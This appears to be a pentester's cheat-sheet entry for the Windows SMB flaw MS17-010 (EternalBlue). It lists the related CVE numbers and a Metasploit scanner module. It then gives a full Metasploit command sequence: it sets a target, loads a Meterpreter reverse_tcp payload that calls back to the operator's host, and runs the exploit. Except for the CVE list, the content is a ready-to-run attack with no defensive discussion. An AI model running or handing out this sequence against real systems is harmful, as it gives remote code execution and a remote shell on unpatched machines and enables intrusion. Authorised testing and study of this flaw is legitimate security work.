CVE

CVE-2017-0143 | MS17-010

  • MS17-010
  • CVE-2017-0143
  • CVE-2017-0144
  • CVE-2017-0145
  • CVE-2017-0146
  • CVE-2017-0148
  • CVE-2017-0147

Scanner

msf5 > use auxiliary/scanner/smb/smb_ms17_010

Exploit

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 > set rhost <target>
msf5 > set payload windows/x64/meterpreter/reverse_tcp
msf5 > set lhost <own-system>
msf5 > run

URL List